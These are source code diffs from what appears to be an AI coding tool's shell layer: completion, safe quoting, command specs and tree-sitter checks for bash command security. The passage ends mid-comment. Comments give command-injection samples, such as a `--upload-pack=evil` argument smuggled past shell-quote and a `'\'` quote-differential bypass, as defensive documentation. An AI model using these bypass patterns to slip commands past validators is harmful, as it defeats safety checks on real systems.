      // Filter the commands table by pattern.
      return `print -rl -- \${(k)commands[(I)${quote([prefix])}*]} 2>/dev/null`
  }
}
/**
 * Runs the completion command for the given shell and turns its output into
 * suggestion items.
 *
 * @param shellType - Which shell's completion command to build
 * @param prefix - Text to complete
 * @param completionType - Kind of completion to generate
 * @param abortSignal - Signal handed to Shell.exec
 * @returns Up to MAX_SHELL_COMPLETIONS suggestions, one per non-blank output
 *   line
 */
async function getCompletionsForShell(
  shellType: 'bash' | 'zsh',
  prefix: string,
  completionType: ShellCompletionType,
  abortSignal: AbortSignal,
): Promise<SuggestionItem[]> {
  let command: string
  switch (shellType) {
    case 'bash':
      command = getBashCompletionCommand(prefix, completionType)
      break
    case 'zsh':
      command = getZshCompletionCommand(prefix, completionType)
      break
    default:
      // Unsupported shell type
      return []
  }

  const shellCommand = await Shell.exec(command, abortSignal, 'bash', {
    timeout: SHELL_COMPLETION_TIMEOUT_MS,
  })
  const { stdout } = await shellCommand.result

  const lines: string[] = stdout.split('\n')
  const suggestions: SuggestionItem[] = []
  for (const text of lines) {
    // Blank lines are skipped; the original text (including any trailing
    // space) is kept for the suggestion.
    if (!text.trim()) continue
    if (suggestions.length >= MAX_SHELL_COMPLETIONS) break
    suggestions.push({
      id: text,
      displayText: text,
      description: undefined,
      metadata: { completionType },
    })
  }
  return suggestions
}
/**
 * Produces shell completions for the text before the cursor.
 * Only bash and zsh are supported (matches Shell.ts execution support); any
 * other shell, an empty prefix, or a failure yields an empty list.
 *
 * @param input - The full input line
 * @param cursorOffset - Cursor position within `input`
 * @param abortSignal - Signal used to cancel the shell invocation
 * @returns Suggestions, each tagged with its completion type and the input
 *   it was computed for
 */
export async function getShellCompletions(
  input: string,
  cursorOffset: number,
  abortSignal: AbortSignal,
): Promise<SuggestionItem[]> {
  const shellType = getShellType()
  if (shellType !== 'bash' && shellType !== 'zsh') {
    return []
  }

  try {
    const context = parseInputContext(input, cursorOffset)
    if (!context.prefix) return []

    const completions = await getCompletionsForShell(
      shellType,
      context.prefix,
      context.completionType,
      abortSignal,
    )

    // Record the input each suggestion was computed for, so callers can
    // detect when the input has since changed.
    return completions.map(suggestion => {
      const metadata = suggestion.metadata as {
        completionType: ShellCompletionType
      }
      return {
        ...suggestion,
        metadata: { ...metadata, inputSnapshot: input },
      }
    })
  } catch (error) {
    logForDebugging(`Shell completion failed: ${error}`)
    return [] // Silent fail
  }
}
+28
View File
@@ -0,0 +1,28 @@
import { quote } from './shellQuote.js'
/**
 * Combines a shell prefix (an executable path, optionally followed by an
 * option) with the command to run.
 *
 * The prefix is split at its last " -": the part before is passed through
 * `quote` as the executable, the part after is appended verbatim. Without
 * such a split point the whole prefix is quoted as the executable.
 *
 * Examples:
 * - "bash" -> quote(bash) quote(command)
 * - "/usr/bin/bash -c" -> quote(/usr/bin/bash) -c quote(command)
 * - "C:\Program Files\Git\bin\bash.exe -c" -> quote(C:\Program Files\Git\bin\bash.exe) -c quote(command)
 *
 * NOTE: because the split happens at the last " -", a prefix with several
 * options (e.g. "bash -l -c") keeps all but the final option inside the
 * quoted executable part.
 *
 * @param prefix The shell prefix string containing executable and optional arguments
 * @param command The command to be executed
 * @returns The formatted command string with quoted components
 */
export function formatShellPrefixCommand(
  prefix: string,
  command: string,
): string {
  const splitAt = prefix.lastIndexOf(' -')
  if (splitAt <= 0) {
    return `${quote([prefix])} ${quote([command])}`
  }

  const execPath = prefix.slice(0, splitAt)
  const args = prefix.slice(splitAt + 1)
  return [quote([execPath]), args, quote([command])].join(' ')
}
+304
View File
@@ -0,0 +1,304 @@
/**
* Safe wrappers for shell-quote library functions that handle errors gracefully
* These are drop-in replacements for the original functions
*/
import {
type ParseEntry,
parse as shellQuoteParse,
quote as shellQuoteQuote,
} from 'shell-quote'
import { logError } from '../log.js'
import { jsonStringify } from '../slowOperations.js'
export type { ParseEntry } from 'shell-quote'
/** Outcome of tryParseShellCommand: the parsed tokens, or an error message. */
export type ShellParseResult =
| { success: true; tokens: ParseEntry[] }
| { success: false; error: string }
/** Outcome of tryQuoteShellArgs: the quoted string, or an error message. */
export type ShellQuoteResult =
| { success: true; quoted: string }
| { success: false; error: string }
/**
 * Parses a command with shell-quote without ever throwing.
 *
 * @param cmd - Command string to tokenize
 * @param env - Optional variable table or lookup function handed to
 *   shell-quote
 * @returns The tokens on success; on failure the error message (Error
 *   instances are also passed to logError)
 */
export function tryParseShellCommand(
  cmd: string,
  env?:
    | Record<string, string | undefined>
    | ((key: string) => string | undefined),
): ShellParseResult {
  try {
    // Same call either way; the branch only exists so each call site matches
    // one of shell-quote's overloads.
    let tokens: ParseEntry[]
    if (typeof env === 'function') {
      tokens = shellQuoteParse(cmd, env)
    } else {
      tokens = shellQuoteParse(cmd, env)
    }
    return { success: true, tokens }
  } catch (error) {
    if (!(error instanceof Error)) {
      return { success: false, error: 'Unknown parse error' }
    }
    logError(error)
    return { success: false, error: error.message }
  }
}
/**
 * Quotes arguments with shell-quote after strict type validation, without
 * ever throwing.
 *
 * Strings are used as-is; numbers, booleans, null and undefined are converted
 * with String(). Any other value (object, symbol, function, ...) makes the
 * call fail with a message naming the offending index.
 *
 * @param args - Values to quote
 * @returns The quoted string on success; on failure the error message (Error
 *   instances are also passed to logError)
 */
export function tryQuoteShellArgs(args: unknown[]): ShellQuoteResult {
  try {
    const validated = args.map((arg, index): string => {
      // null is checked before typeof, which would report it as 'object'.
      if (arg === null || arg === undefined) return String(arg)

      const type = typeof arg
      switch (type) {
        case 'string':
          return arg as string
        case 'number':
        case 'boolean':
          return String(arg)
        case 'object':
        case 'symbol':
        case 'function':
          throw new Error(
            `Cannot quote argument at index ${index}: ${type} values are not supported`,
          )
        default:
          throw new Error(
            `Cannot quote argument at index ${index}: unsupported type ${type}`,
          )
      }
    })
    return { success: true, quoted: shellQuoteQuote(validated) }
  } catch (error) {
    if (!(error instanceof Error)) {
      return { success: false, error: 'Unknown quote error' }
    }
    logError(error)
    return { success: false, error: error.message }
  }
}
/**
 * Detects signs that shell-quote misread a command.
 *
 * Two independent checks are made:
 *
 * 1. Unterminated quotes in the raw command. shell-quote silently drops an
 *    unmatched `"` or `'` and parses the rest as unquoted, leaving no trace
 *    in the tokens: `echo "hi;evil | cat` (one unmatched `"`) is a bash
 *    syntax error, yet shell-quote yields clean tokens with `;` as an
 *    operator. The raw string is therefore walked with bash quote semantics.
 *
 * 2. Token fragments. Ambiguous input (such as JSON-like text containing
 *    semicolons) is split according to shell rules: `echo {"hi":"hi;evil"}`
 *    is parsed with `;` as an operator, producing tokens like `{hi:"hi`.
 *    Legitimate commands produce complete tokens, so any string token with
 *    unbalanced `{}`, `()`, `[]` or an odd number of unescaped quotes is
 *    flagged.
 *
 * Security: This prevents command injection via HackerOne #3482049 where
 * shell-quote's correct parsing of ambiguous input can be exploited.
 *
 * @param command - The original command string
 * @param parsed - Tokens shell-quote produced for it
 * @returns true when either check finds a problem
 */
export function hasMalformedTokens(
  command: string,
  parsed: ParseEntry[],
): boolean {
  // Pass 1: quote state over the raw command. A backslash escapes the next
  // character everywhere except inside single quotes, where it is literal.
  let inSingle = false
  let inDouble = false
  for (let i = 0; i < command.length; i++) {
    const c = command[i]
    if (c === '\\' && !inSingle) {
      i++
      continue
    }
    if (c === '"' && !inSingle) {
      inDouble = !inDouble
    } else if (c === "'" && !inDouble) {
      inSingle = !inSingle
    }
  }
  // Still inside a quote at the end means an odd number of that quote.
  if (inDouble || inSingle) return true

  // Pass 2: per-token balance checks.
  const countMatches = (text: string, pattern: RegExp): number =>
    (text.match(pattern) || []).length
  const bracketPairs: Array<[RegExp, RegExp]> = [
    [/{/g, /}/g],
    [/\(/g, /\)/g],
    [/\[/g, /\]/g],
  ]

  for (const entry of parsed) {
    if (typeof entry !== 'string') continue

    for (const [open, close] of bracketPairs) {
      if (countMatches(entry, open) !== countMatches(entry, close)) return true
    }

    // Quotes not preceded by a backslash must come in pairs.
    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by hasCommandSeparator check at caller, runs on short per-token strings
    if (countMatches(entry, /(?<!\\)"/g) % 2 !== 0) return true
    // eslint-disable-next-line custom-rules/no-lookbehind-regex -- same as above
    if (countMatches(entry, /(?<!\\)'/g) % 2 !== 0) return true
  }
  return false
}
/**
 * Detects commands that exploit shell-quote's incorrect handling of
 * backslashes inside single quotes.
 *
 * In bash, single quotes preserve ALL characters literally, so '\' is simply
 * the string \ : the quote opens, contains a backslash, and the next ' closes
 * it. shell-quote's chunker regex '((\\'|[^'])*?)' instead treats \' as an
 * escape inside single quotes, so '\' does NOT close the string there. A
 * pattern such as '\' <payload> '\' therefore hides <payload> from security
 * checks, because shell-quote sees one long single-quoted string.
 *
 * The command is walked with correct bash semantics, and every closing
 * single quote is examined for backslashes immediately before it:
 *
 * - Odd count: always a differential.
 *     '\'    shell-quote: \' is a literal ', still open. bash: \, closed.
 *     'abc\' shell-quote: abc then a literal ', still open. bash: abc\, closed.
 *     '\\\'  shell-quote: \\ + \', still open. bash: \\\, closed.
 * - Even count: a differential only when another ' occurs later.
 *     '\\' alone: shell-quote backtracks and both parsers agree.
 *     '\\' 'next': the regex tries \' before [^'], so the last backslash plus
 *     the closing ' is consumed as an escape and matching continues to the
 *     next ', merging tokens; without a later ' it backtracks and closes
 *     correctly. See H1 report:
 *       git ls-remote 'safe\\' '--upload-pack=evil' 'repo'
 *       shell-quote: ["git","ls-remote","safe\\\\ --upload-pack=evil repo"]
 *       bash:        ["git","ls-remote","safe\\\\","--upload-pack=evil","repo"]
 *
 * @param command - The command string to inspect
 * @returns true when the command contains such a pattern
 */
export function hasShellQuoteSingleQuoteBug(command: string): boolean {
  let inSingleQuote = false
  let inDoubleQuote = false

  for (let i = 0; i < command.length; i++) {
    const char = command[i]

    if (inSingleQuote) {
      // Inside single quotes only the closing quote matters; backslashes and
      // double quotes are literal.
      if (char !== "'") continue
      inSingleQuote = false

      // Count the backslashes directly before this closing quote.
      let backslashCount = 0
      for (let j = i - 1; j >= 0 && command[j] === '\\'; j--) {
        backslashCount++
      }
      if (backslashCount === 0) continue
      if (backslashCount % 2 === 1) return true
      // Even count: any later ' will do as a false closing quote, because the
      // chunker regex does not respect bash quote state (a ' inside double
      // quotes is consumable too).
      if (command.indexOf("'", i + 1) !== -1) return true
      continue
    }

    if (char === '\\') {
      // Outside single quotes a backslash escapes the next character.
      i++
      continue
    }
    if (char === '"') {
      inDoubleQuote = !inDoubleQuote
      continue
    }
    if (char === "'" && !inDoubleQuote) {
      inSingleQuote = true
    }
  }
  return false
}
/**
 * Quotes arguments for safe use in a shell command.
 *
 * Strict validation (tryQuoteShellArgs) is tried first. If it fails, a
 * lenient pass converts unsupported values to strings via jsonStringify and
 * quotes the result with shell-quote.
 *
 * @param args - Values to quote
 * @returns The quoted argument string
 * @throws Error when the lenient pass fails as well
 */
export function quote(args: ReadonlyArray<unknown>): string {
  const strict = tryQuoteShellArgs([...args])
  if (strict.success) return strict.quoted

  try {
    const stringArgs = args.map(arg => {
      const isPrimitive =
        arg === null ||
        arg === undefined ||
        typeof arg === 'string' ||
        typeof arg === 'number' ||
        typeof arg === 'boolean'
      // Objects, symbols, functions, etc. get a JSON representation so the
      // call does not crash; the result still goes through shell-quote below.
      return isPrimitive ? String(arg) : jsonStringify(arg)
    })
    return shellQuoteQuote(stringArgs)
  } catch (error) {
    // SECURITY: Never use JSON.stringify as a fallback for shell quoting.
    // JSON.stringify uses double quotes which don't prevent shell command execution.
    // For example, jsonStringify(['echo', '$(whoami)']) produces "echo" "$(whoami)"
    if (error instanceof Error) {
      logError(error)
    }
    throw new Error('Failed to quote shell arguments safely')
  }
}
+128
View File
@@ -0,0 +1,128 @@
import { quote } from './shellQuote.js'
/**
 * Reports whether a command appears to contain a heredoc.
 *
 * Recognised forms: <<EOF, <<'EOF', <<"EOF", <<-EOF, <<-'EOF', <<\EOF
 * (optional whitespace is allowed between the operator and the word).
 *
 * Commands that look like they use `<<` as a bit-shift (digit << digit,
 * [[ n << m ]], or anything inside $(( ... ))) are rejected up front, so a
 * command containing both a bit-shift and a heredoc yields false.
 */
function containsHeredoc(command: string): boolean {
  // `<<` used arithmetically rather than as a redirection.
  const bitShiftPatterns = [
    /\d\s*<<\s*\d/,
    /\[\[\s*\d+\s*<<\s*\d+\s*\]\]/,
    /\$\(\(.*<<.*\)\)/,
  ]
  if (bitShiftPatterns.some(pattern => pattern.test(command))) {
    return false
  }

  // << then optional -, then either an optionally quoted word (the closing
  // quote must match the opening one) or a backslash-escaped word.
  return /<<-?\s*(?:(['"]?)(\w+)\1|\\(\w+))/.test(command)
}
/**
 * Reports whether a command contains a quoted string that spans a literal
 * newline.
 *
 * Both patterns allow backslash escapes inside the quotes (so \' and \" do
 * not end the match) and require at least one real newline between the
 * opening and closing quote character.
 */
function containsMultilineString(command: string): boolean {
  const multilinePatterns = [
    // '...\n...'
    /'(?:[^'\\]|\\.)*\n(?:[^'\\]|\\.)*'/,
    // "...\n..."
    /"(?:[^"\\]|\\.)*\n(?:[^"\\]|\\.)*"/,
  ]
  return multilinePatterns.some(pattern => pattern.test(command))
}
/**
 * Quotes a whole shell command, taking care not to mangle heredocs or
 * multiline quoted strings.
 *
 * Regular commands go through quote(). Commands containing a heredoc or a
 * multiline string are wrapped in single quotes by hand instead, because
 * shell-quote escapes `!` to `\!` in those cases.
 *
 * @param command The command to quote
 * @param addStdinRedirect Whether to add < /dev/null
 * @returns The quoted command
 */
export function quoteShellCommand(
  command: string,
  addStdinRedirect: boolean = true,
): string {
  const hasHeredoc = containsHeredoc(command)

  if (!hasHeredoc && !containsMultilineString(command)) {
    // Regular command: let shell-quote handle it.
    return addStdinRedirect
      ? quote([command, '<', '/dev/null'])
      : quote([command])
  }

  // Manual single-quote wrapping; only embedded single quotes need
  // escaping (close the quote, emit a double-quoted ', reopen).
  const quoted = `'${command.replace(/'/g, "'\"'\"'")}'`

  // A heredoc supplies its own input, so it never gets the stdin redirect.
  if (hasHeredoc || !addStdinRedirect) {
    return quoted
  }
  return `${quoted} < /dev/null`
}
/**
 * Reports whether a command already redirects stdin from somewhere.
 *
 * Matches `< file`, `</path/to/file`, `< /dev/null` and similar. Does not
 * match `<<EOF` (heredoc), `<<` (bit shift) or `<(...)` (process
 * substitution).
 */
export function hasStdinRedirect(command: string): boolean {
  // The `<` must sit at the start of the string or right after whitespace
  // or a command separator, must not be followed by `<` or `(`, and must
  // be followed (after optional whitespace) by a target.
  const stdinRedirectPattern = /(?:^|[\s;&|])<(?![<(])\s*\S+/
  return stdinRedirectPattern.test(command)
}
/**
 * Decides whether a stdin redirect may be appended to a command.
 *
 * The answer is no when the command contains a heredoc (a redirect would
 * interfere with the heredoc terminator) or when it already redirects
 * stdin itself; otherwise adding one is considered safe.
 *
 * @param command The command to check
 * @returns true if stdin redirect can be safely added
 */
export function shouldAddStdinRedirect(command: string): boolean {
  return !containsHeredoc(command) && !hasStdinRedirect(command)
}
/**
 * Rewrites Windows CMD-style `>nul` redirects to POSIX `/dev/null`.
 *
 * Background: the model sometimes emits CMD syntax such as `ls 2>nul` even
 * though the shell is always POSIX (Git Bash / WSL on Windows). Git Bash
 * then creates a literal file called `nul`, a reserved Windows device name
 * that is very hard to delete and breaks `git add .` and `git clone`.
 * See anthropics/claude-code#4928.
 *
 * Rewritten: `>nul`, `> NUL`, `2>nul`, `&>nul`, `>>nul` (any letter case).
 * Left alone: `>null`, `>nullable`, `>nul.txt`, `cat nul.txt`.
 *
 * Known limitation: shell quoting is not parsed, so `echo ">nul"` is also
 * rewritten. That is accepted as rare and harmless.
 */
// Group 1 captures the redirect operator (optional fd digit, optional &,
// one or more >, trailing whitespace). The lookahead requires the name to
// end at whitespace, end of input, or one of | & ; ).
const NUL_REDIRECT_REGEX = /(\d?&?>+\s*)[Nn][Uu][Ll](?=\s|$|[|&;)\n])/g

export function rewriteWindowsNullRedirect(command: string): string {
  return command.replace(
    NUL_REDIRECT_REGEX,
    (_match: string, redirectOperator: string) =>
      `${redirectOperator}/dev/null`,
  )
}
+14
View File
@@ -0,0 +1,14 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for the `alias` command.
 *
 * Declares a single positional argument, `definition` (in `name=value`
 * form), flagged both optional and variadic.
 * NOTE(review): the exact meaning of `isOptional` / `isVariadic` is defined
 * by CommandSpec in ../registry.js, which is not visible here — presumably
 * "may be omitted" and "may repeat"; confirm there.
 */
const alias: CommandSpec = {
name: 'alias',
description: 'Create or list command aliases',
args: {
name: 'definition',
description: 'Alias definition in the form name=value',
isOptional: true,
isVariadic: true,
},
}
export default alias
+18
View File
@@ -0,0 +1,18 @@
import type { CommandSpec } from '../registry.js'
import alias from './alias.js'
import nohup from './nohup.js'
import pyright from './pyright.js'
import sleep from './sleep.js'
import srun from './srun.js'
import time from './time.js'
import timeout from './timeout.js'
/**
 * Default export: the command specs imported above, collected in one array.
 *
 * `satisfies CommandSpec[]` type-checks every entry against CommandSpec
 * without widening the array's inferred type.
 */
export default [
pyright,
timeout,
sleep,
alias,
nohup,
time,
srun,
] satisfies CommandSpec[]
+13
View File
@@ -0,0 +1,13 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for `nohup`.
 *
 * Declares one positional argument, `command`, flagged `isCommand`.
 * NOTE(review): `isCommand` presumably tells consumers that the argument
 * is itself a command to be analysed — confirm against CommandSpec in
 * ../registry.js.
 */
const nohup: CommandSpec = {
name: 'nohup',
description: 'Run a command immune to hangups',
args: {
name: 'command',
description: 'Command to run with nohup',
isCommand: true,
},
}
export default nohup
+91
View File
@@ -0,0 +1,91 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for the `pyright` CLI (Python type checker).
 *
 * `options` lists the recognised flags; an option carrying an `args` entry
 * takes a value, the others are plain switches. The trailing top-level
 * `args` describes the positional file/directory list.
 * `satisfies CommandSpec` validates the literal against CommandSpec while
 * keeping its inferred literal type.
 */
export default {
name: 'pyright',
description: 'Type checker for Python',
options: [
{ name: ['--help', '-h'], description: 'Show help message' },
{ name: '--version', description: 'Print pyright version and exit' },
{
name: ['--watch', '-w'],
description: 'Continue to run and watch for changes',
},
{
name: ['--project', '-p'],
description: 'Use the configuration file at this location',
args: { name: 'FILE OR DIRECTORY' },
},
// A bare `-` is listed as an option of its own.
{ name: '-', description: 'Read file or directory list from stdin' },
{
name: '--createstub',
description: 'Create type stub file(s) for import',
args: { name: 'IMPORT' },
},
{
name: ['--typeshedpath', '-t'],
description: 'Use typeshed type stubs at this location',
args: { name: 'DIRECTORY' },
},
{
name: '--verifytypes',
description: 'Verify completeness of types in py.typed package',
args: { name: 'IMPORT' },
},
{
name: '--ignoreexternal',
description: 'Ignore external imports for --verifytypes',
},
{
name: '--pythonpath',
description: 'Path to the Python interpreter',
args: { name: 'FILE' },
},
{
name: '--pythonplatform',
description: 'Analyze for platform',
args: { name: 'PLATFORM' },
},
{
name: '--pythonversion',
description: 'Analyze for Python version',
args: { name: 'VERSION' },
},
// Note: `-v` is the short form of --venvpath here, not of --verbose.
{
name: ['--venvpath', '-v'],
description: 'Directory that contains virtual environments',
args: { name: 'DIRECTORY' },
},
{ name: '--outputjson', description: 'Output results in JSON format' },
{ name: '--verbose', description: 'Emit verbose diagnostics' },
{ name: '--stats', description: 'Print detailed performance stats' },
{
name: '--dependencies',
description: 'Emit import dependency information',
},
{
name: '--level',
description: 'Minimum diagnostic level',
args: { name: 'LEVEL' },
},
{
name: '--skipunannotated',
description: 'Skip type analysis of unannotated functions',
},
{
name: '--warnings',
description: 'Use exit code of 1 if warnings are reported',
},
// The only option whose value is marked optional.
{
name: '--threads',
description: 'Use up to N threads to parallelize type checking',
args: { name: 'N', isOptional: true },
},
],
// Positional arguments: zero or more files/directories.
args: {
name: 'files',
description:
'Specify files or directories to analyze (overrides config file)',
isVariadic: true,
isOptional: true,
},
} satisfies CommandSpec
+13
View File
@@ -0,0 +1,13 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for `sleep`.
 *
 * Declares one positional argument, `duration`, explicitly marked as not
 * optional.
 */
const sleep: CommandSpec = {
name: 'sleep',
description: 'Delay for a specified amount of time',
args: {
name: 'duration',
description: 'Duration to sleep (seconds or with suffix like 5s, 2m, 1h)',
isOptional: false,
},
}
export default sleep
+31
View File
@@ -0,0 +1,31 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for SLURM's `srun`.
 *
 * Only two value-taking options are declared (-n/--ntasks and -N/--nodes);
 * the positional argument is the command to run, flagged `isCommand`.
 * NOTE(review): `isCommand` presumably marks the argument as a nested
 * command — confirm against CommandSpec in ../registry.js.
 */
const srun: CommandSpec = {
name: 'srun',
description: 'Run a command on SLURM cluster nodes',
options: [
{
name: ['-n', '--ntasks'],
description: 'Number of tasks',
args: {
name: 'count',
description: 'Number of tasks to run',
},
},
{
name: ['-N', '--nodes'],
description: 'Number of nodes',
args: {
name: 'count',
description: 'Number of nodes to allocate',
},
},
],
args: {
name: 'command',
description: 'Command to run on the cluster',
isCommand: true,
},
}
export default srun
+13
View File
@@ -0,0 +1,13 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for `time`.
 *
 * Declares one positional argument, `command`, flagged `isCommand`.
 * NOTE(review): `isCommand` presumably marks the argument as a nested
 * command — confirm against CommandSpec in ../registry.js.
 */
const time: CommandSpec = {
name: 'time',
description: 'Time a command',
args: {
name: 'command',
description: 'Command to time',
isCommand: true,
},
}
export default time
+20
View File
@@ -0,0 +1,20 @@
import type { CommandSpec } from '../registry.js'
/**
 * Spec entry for `timeout`.
 *
 * Unlike the single-argument specs, `args` is an array here: first the
 * mandatory `duration`, then the `command` to run (flagged `isCommand`).
 * No options are declared.
 */
const timeout: CommandSpec = {
name: 'timeout',
description: 'Run a command with a time limit',
args: [
{
name: 'duration',
description: 'Duration to wait before timing out (e.g., 10, 5s, 2m)',
isOptional: false,
},
{
name: 'command',
description: 'Command to run',
isCommand: true,
},
],
}
export default timeout
+506
View File
@@ -0,0 +1,506 @@
/**
* Tree-sitter AST analysis utilities for bash command security validation.
*
* These functions extract security-relevant information from tree-sitter
* parse trees, providing more accurate analysis than regex/shell-quote
* parsing. Each function takes a root node and command string, and returns
* structured data that can be used by security validators.
*
* The native NAPI parser returns plain JS objects — no cleanup needed.
*/
/**
 * Structural shape of a parse-tree node as consumed by this module.
 * Callers pass the root as `unknown`; each exported function casts it to
 * this type without runtime validation.
 */
type TreeSitterNode = {
/** Grammar node type; compared against names such as 'raw_string', 'list' or '&&'. */
type: string
/** Source text of the node; recorded as segment text and inspected for heredoc delimiters. */
text: string
/** Start of the node's range; with endIndex it forms a half-open [start, end) range used to slice the command string. */
startIndex: number
/** End (exclusive) of the node's range. */
endIndex: number
/** Child nodes in order. The walkers in this file skip falsy entries before descending. */
children: TreeSitterNode[]
/** Number of children. Not read by the functions in this section of the file. */
childCount: number
}
/**
 * Three views of a command with quoted material stripped to different
 * degrees, as produced by extractQuoteContext.
 */
export type QuoteContext = {
/**
 * Command text with single-quoted content removed (double-quoted content preserved).
 * ANSI-C strings and quoted heredocs are removed as well, and the `"`
 * delimiters of outermost double-quoted strings are dropped while their
 * content is kept.
 */
withDoubleQuotes: string
/** Command text with all quoted content removed (quotes of every kind plus quoted heredocs). */
fullyUnquoted: string
/**
 * Like fullyUnquoted but preserves quote characters (', ").
 * ANSI-C strings collapse to `$''`; quoted heredocs are removed entirely.
 */
unquotedKeepQuoteChars: string
}
/**
 * Summary of how a command is composed, as produced by
 * extractCompoundStructure.
 */
export type CompoundStructure = {
/** Whether the command has compound operators (&&, ||, ;) at the top level — true exactly when `operators` is non-empty */
hasCompoundOperators: boolean
/** Whether the command has pipelines */
hasPipeline: boolean
/** Whether the command has subshells */
hasSubshell: boolean
/** Whether the command has command groups ({...}) */
hasCommandGroup: boolean
/** Top-level compound operator types found, in traversal order (duplicates kept) */
operators: string[]
/** Individual command segments split by compound operators; falls back to the whole command when nothing was collected */
segments: string[]
}
/**
 * Presence flags for security-relevant constructs, as produced by
 * extractDangerousPatterns. Each flag is true when at least one node of
 * the corresponding type exists anywhere in the tree.
 */
export type DangerousPatterns = {
/** Has $() or backtick command substitution (outside quotes that would make it safe) — node type `command_substitution` */
hasCommandSubstitution: boolean
/** Has <() or >() process substitution — node type `process_substitution` */
hasProcessSubstitution: boolean
/** Has ${...} parameter expansion — node type `expansion` */
hasParameterExpansion: boolean
/** Has heredoc — node type `heredoc_redirect` */
hasHeredoc: boolean
/** Has comment — node type `comment` */
hasComment: boolean
}
/**
 * Combined result of analyzeCommand: one field per extractor in this
 * module.
 */
export type TreeSitterAnalysis = {
/** Views of the command with quoted content stripped. */
quoteContext: QuoteContext
/** Operators, segments and structural flags. */
compoundStructure: CompoundStructure
/** Whether actual operator nodes (;, &&, ||) exist — if false, \; is just a word argument */
hasActualOperatorNodes: boolean
/** Presence flags for substitutions, expansions, heredocs and comments. */
dangerousPatterns: DangerousPatterns
}
/**
 * Accumulator filled by collectQuoteSpans. Every entry is a
 * [startIndex, endIndex] pair copied from a node, bucketed by the kind of
 * quoting the node represents.
 */
type QuoteSpans = {
raw: Array<[number, number]> // raw_string (single-quoted)
ansiC: Array<[number, number]> // ansi_c_string ($'...')
double: Array<[number, number]> // string (double-quoted); outermost only
heredoc: Array<[number, number]> // quoted heredoc_redirect
}
/**
 * Walks the tree once and records the span of every quote-like node into
 * `out`, bucketed by kind.
 *
 * This fuses what used to be several per-type walks, and reproduces their
 * individual stopping rules:
 *  - raw_string / ansi_c_string: recorded, never descended into (their
 *    bodies are literal text, so no nested quote nodes exist).
 *  - string (double-quoted): only the outermost one on a path is recorded,
 *    but the walk still descends, because `"$(cmd 'x')"` contains a real
 *    inner raw_string.
 *  - heredoc_redirect: when the delimiter is quoted (<<'EOF', <<"EOF",
 *    <<\EOF) the body is literal, so the span is recorded and the walk
 *    stops. Unquoted heredocs expand $()/${}, so they are not recorded and
 *    the walk continues into them to pick up nested quote nodes.
 *
 * @param node Node to inspect.
 * @param out Accumulator that receives the spans.
 * @param inDouble True when an enclosing double-quoted string has already
 *   been recorded on this path.
 */
function collectQuoteSpans(
  node: TreeSitterNode,
  out: QuoteSpans,
  inDouble: boolean,
): void {
  const spanOf = (): [number, number] => [node.startIndex, node.endIndex]

  if (node.type === 'raw_string') {
    out.raw.push(spanOf())
    return
  }
  if (node.type === 'ansi_c_string') {
    out.ansiC.push(spanOf())
    return
  }

  let childrenInDouble = inDouble
  if (node.type === 'string') {
    if (!inDouble) out.double.push(spanOf())
    childrenInDouble = true
  } else if (node.type === 'heredoc_redirect') {
    // Quoted-ness is decided by the first character of the first
    // heredoc_start child: ', " or backslash.
    const startToken = node.children.find(
      child => child && child.type === 'heredoc_start',
    )
    const leading = startToken ? startToken.text[0] : undefined
    if (leading === "'" || leading === '"' || leading === '\\') {
      out.heredoc.push(spanOf())
      return
    }
  }

  for (const child of node.children) {
    if (child) collectQuoteSpans(child, out, childrenInDouble)
  }
}
/**
 * Expands half-open [start, end) spans into the set of every integer
 * position they cover. Overlapping spans simply contribute the same
 * positions twice; empty or inverted spans contribute nothing.
 */
function buildPositionSet(spans: Array<[number, number]>): Set<number> {
  const positions = new Set<number>()
  spans.forEach(([from, to]) => {
    let pos = from
    while (pos < to) {
      positions.add(pos)
      pos += 1
    }
  })
  return positions
}
/**
 * Filters out every span that lies strictly inside another span, leaving
 * only the outermost ones (input order is preserved).
 *
 * Nested quotes such as `"$(echo 'hi')"` produce overlapping spans because
 * the inner raw_string is discovered while descending into the outer
 * string. Editing the command with both would corrupt indices: once the
 * outer span is removed or replaced, the inner span's offsets are stale.
 *
 * Spans with identical bounds do not contain each other, so exact
 * duplicates are all kept.
 */
function dropContainedSpans<T extends readonly [number, number, ...unknown[]]>(
  spans: T[],
): T[] {
  // True when `outer` covers `inner` and is larger on at least one side.
  const strictlyContains = (outer: T, inner: T): boolean => {
    const covers = outer[0] <= inner[0] && outer[1] >= inner[1]
    const sameBounds = outer[0] === inner[0] && outer[1] === inner[1]
    return covers && !sameBounds
  }

  const outermost: T[] = []
  for (const candidate of spans) {
    const swallowed = spans.some(other => strictlyContains(other, candidate))
    if (!swallowed) outermost.push(candidate)
  }
  return outermost
}
/**
 * Returns `command` with the given [start, end) character ranges cut out.
 *
 * Spans nested inside another span are discarded first; the survivors are
 * applied from the highest start index downwards so that each cut leaves
 * the offsets of the remaining (earlier) spans untouched.
 */
function removeSpans(command: string, spans: Array<[number, number]>): string {
  if (spans.length === 0) return command

  const rightToLeft = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
  return rightToLeft.reduce(
    (text, [from, to]) => text.slice(0, from) + text.slice(to),
    command,
  )
}
/**
 * Returns `command` with each span's content removed but its delimiters
 * kept: every [start, end) range is replaced by the span's own opening and
 * closing strings (for example `'` + `'`).
 *
 * As with removeSpans, nested spans are dropped first and the rest are
 * applied right-to-left so earlier offsets stay valid.
 */
function replaceSpansKeepQuotes(
  command: string,
  spans: Array<[number, number, string, string]>,
): string {
  if (spans.length === 0) return command

  const rightToLeft = dropContainedSpans(spans).sort((a, b) => b[0] - a[0])
  return rightToLeft.reduce(
    (text, [from, to, opener, closer]) =>
      text.slice(0, from) + opener + closer + text.slice(to),
    command,
  )
}
/**
 * Derives the three quote-stripped views of a command from the AST.
 * Replaces the manual character-by-character extractQuotedContent().
 *
 * Node types involved:
 * - raw_string: single-quoted ('...')
 * - string: double-quoted ("...")
 * - ansi_c_string: ANSI-C quoting ($'...'); the span includes the leading $
 * - heredoc_redirect: QUOTED heredocs only (<<'EOF', <<"EOF", <<\EOF). The
 *   whole redirect span is stripped because the body is literal text in
 *   bash. UNQUOTED heredocs (<<EOF) stay in place since bash expands
